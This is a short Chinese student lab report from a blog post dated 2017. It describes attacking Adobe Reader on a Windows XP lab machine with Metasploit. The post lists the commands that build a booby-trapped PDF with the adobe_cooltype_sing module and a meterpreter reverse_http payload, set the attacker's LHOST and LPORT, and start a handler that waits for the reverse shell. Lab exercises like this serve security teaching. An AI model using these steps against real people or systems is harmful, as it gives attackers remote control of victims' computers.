20145333茹翔 Exp5 Adobe阅读器漏洞攻击
20145333茹翔 Exp5 Adobe阅读器漏洞攻击
实验过程
-
主机为kali的ip地址为:
192.168.1.111
、靶机windows xp 的ip地址为:192.168.1.110
-
使用命令
msfconsole
进入控制台 -
根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用
info
命令查看模块的基本信息,以及参数要求,使用命令为use windows/fileformat/adobe_cooltype_sing
进入攻击模块 -
设置攻击载荷payloads ,命令为
set payloads windows/meterpreter/reverse_http
-
使用命令
show options
来确定需要修改的参数。需要设置的参数有LHOST
、LPORT
、FILENAME
set LHOST 192.168.1.111
set LPORT 5333
set FILENAME 5333.pdf
-
使用命令
exploit
生成5333.pdf
-
其生成路径,是一个隐藏文件夹,可以打开另一个终端,使用命令
cp 5333.pdf /root/5333.pdf
将其复制到根目录下
-
退出并重新进入msf平台
-
使用命令
use exploit/multi/handler
进入监听模式,设置好参数,执行exploit
等待被攻击者的接听。
-
连接成功
posted on 2017-04-13 01:10 20145333茹翔 阅读(141) 评论(0) 编辑 收藏 举报